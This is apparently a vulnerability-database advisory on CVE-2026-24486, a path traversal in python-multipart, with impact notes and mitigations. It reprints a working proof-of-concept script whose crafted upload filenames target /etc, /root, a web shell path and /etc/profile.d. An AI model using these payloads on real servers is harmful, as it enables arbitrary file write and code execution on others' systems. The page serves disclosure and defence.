Python-Multipart 0.0.22 - Path Traversal
Python-Multipart versions prior to 0. 0. 22 contain a path traversal vulnerability (CVE-2026-24486) that allows arbitrary file write when the UPLOAD_KEEP_FILENAME option is enabled and UPLOAD_DIR is configured. This occurs because malicious filenames can traverse directories and overwrite files outside the intended upload directory. Exploit code in Python demonstrates uploading files with crafted filenames to write to arbitrary paths on the target system. The vulnerability is medium severity and can be mitigated by upgrading to python-multipart version 0. 0. 22 or later, avoiding the use of UPLOAD_KEEP_FILENAME=True, and sanitizing filenames by extracting only the basename.
AI Analysis
Technical Summary
The Python-Multipart library before version 0.0.22 is vulnerable to a path traversal issue (CVE-2026-24486) when the configuration uses UPLOAD_KEEP_FILENAME=True along with UPLOAD_DIR. This vulnerability allows an attacker to write files to arbitrary locations on the server by submitting malicious filenames containing directory traversal sequences. The provided exploit code in Python demonstrates how an attacker can upload files with crafted filenames to overwrite sensitive files or place malicious scripts. The vulnerability is confirmed with proof-of-concept code and affects environments using python-multipart for file uploads without proper filename sanitization.
Potential Impact
An attacker can exploit this vulnerability to write arbitrary files to locations outside the designated upload directory. This can lead to overwriting critical system or application files, potentially resulting in code execution, privilege escalation, or denial of service depending on the target environment and file locations overwritten.
Mitigation Recommendations
A fix is available by upgrading python-multipart to version 0.0.22 or later. Additionally, avoid enabling UPLOAD_KEEP_FILENAME=True and ensure filenames are sanitized by using only the basename (e.g., filename = os.path.basename(file.filename)) before saving uploaded files. These steps prevent directory traversal in filenames and mitigate the vulnerability.
Indicators of Compromise
- exploit-code: # Exploit Title: Python-Multipart 0.0.22 - Path Traversal # Date: 2026-02-23 # Exploit Author: cardosource # Vendor Homepage: https://github.com/Kludex/python-multipart # Software Link: https://pypi.org/project/python-multipart/ # Version: < 0.0.22 (REQUIRED) # Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo) # CVE : CVE-2026-24486 """ PoC for CVE-2026-24486: Path Traversal in python-multipart when UPLOAD_KEEP_FILENAME=True + UPLOAD_DIR is configured. Allows arbitrary file write via malicious filename. """ import requests import time import os import sys TARGET_URL = "http://localhost:8000/upload" SOURCE_FILE = "/etc/hosts" # Small file to upload (content written to target) if not os.path.exists(SOURCE_FILE): print(f"[!] Source file not found: {SOURCE_FILE}") sys.exit(1) # Malicious filenames (payloads) payloads = [ "/tmp/poc-abs.txt", "/etc/poc-etc.txt", "/root/poc-root.txt", "../../var/www/html/shell.php", "../../etc/profile.d/mal.sh", "../../../tmp/poc-deep.txt", "../../etc/passwd%00.txt", "//etc//poc-double-slash.txt", ] print("[*] CVE-2026-24486 PoC") print(f"[*] Target: {TARGET_URL}") print(f"[*] Using source file: {SOURCE_FILE}") print(f"[*] Testing {len(payloads)} payloads...\n") for i, filename in enumerate(payloads, 1): print(f"[{i}/{len(payloads)}] Testing: {filename}") try: files = { 'file': (filename, open(SOURCE_FILE, 'rb'), 'text/plain') } r = requests.post(TARGET_URL, files=files, timeout=8) print(f" Status: {r.status_code}") if r.text.strip(): print(f" Response: {r.text.strip()}") else: print(" Response: (empty)") except Exception as e: print(f" Error: {e}") print("-" * 50) time.sleep(1.0) print("\n[*] Done.") print("Verify files in container:") print(" docker exec -it vuln-poc find / -name '*poc*' -o -name '*shell*' 2>/dev/null") print("\nMitigation:") print(" - Upgrade: pip install python-multipart>=0.0.22") print(" - Avoid UPLOAD_KEEP_FILENAME=True") print(" - Sanitize: filename = os.path.basename(file.filename)")
Python-Multipart 0.0.22 - Path Traversal
Description
Python-Multipart versions prior to 0. 0. 22 contain a path traversal vulnerability (CVE-2026-24486) that allows arbitrary file write when the UPLOAD_KEEP_FILENAME option is enabled and UPLOAD_DIR is configured. This occurs because malicious filenames can traverse directories and overwrite files outside the intended upload directory. Exploit code in Python demonstrates uploading files with crafted filenames to write to arbitrary paths on the target system. The vulnerability is medium severity and can be mitigated by upgrading to python-multipart version 0. 0. 22 or later, avoiding the use of UPLOAD_KEEP_FILENAME=True, and sanitizing filenames by extracting only the basename.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Python-Multipart library before version 0.0.22 is vulnerable to a path traversal issue (CVE-2026-24486) when the configuration uses UPLOAD_KEEP_FILENAME=True along with UPLOAD_DIR. This vulnerability allows an attacker to write files to arbitrary locations on the server by submitting malicious filenames containing directory traversal sequences. The provided exploit code in Python demonstrates how an attacker can upload files with crafted filenames to overwrite sensitive files or place malicious scripts. The vulnerability is confirmed with proof-of-concept code and affects environments using python-multipart for file uploads without proper filename sanitization.
Potential Impact
An attacker can exploit this vulnerability to write arbitrary files to locations outside the designated upload directory. This can lead to overwriting critical system or application files, potentially resulting in code execution, privilege escalation, or denial of service depending on the target environment and file locations overwritten.
Mitigation Recommendations
A fix is available by upgrading python-multipart to version 0.0.22 or later. Additionally, avoid enabling UPLOAD_KEEP_FILENAME=True and ensure filenames are sanitized by using only the basename (e.g., filename = os.path.basename(file.filename)) before saving uploaded files. These steps prevent directory traversal in filenames and mitigate the vulnerability.
Technical Details
- Edb Id
- 52543
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Python-Multipart 0.0.22 - Path Traversal
# Exploit Title: Python-Multipart 0.0.22 - Path Traversal # Date: 2026-02-23 # Exploit Author: cardosource # Vendor Homepage: https://github.com/Kludex/python-multipart # Software Link: https://pypi.org/project/python-multipart/ # Version: < 0.0.22 (REQUIRED) # Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo) # CVE : CVE-2026-24486 """ PoC for CVE-2026-24486: Path Traversal in python-multipart when UPLOAD_KEEP_FILENAME=True + UPLOAD_DIR is configured. Allows arbitrary file write v... (1698 more characters)
Threat ID: 69f5140dcbff5d86105a401a
Added to database: 5/1/2026, 8:58:53 PM
Last enriched: 5/1/2026, 8:59:01 PM
Last updated: 5/2/2026, 5:49:30 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.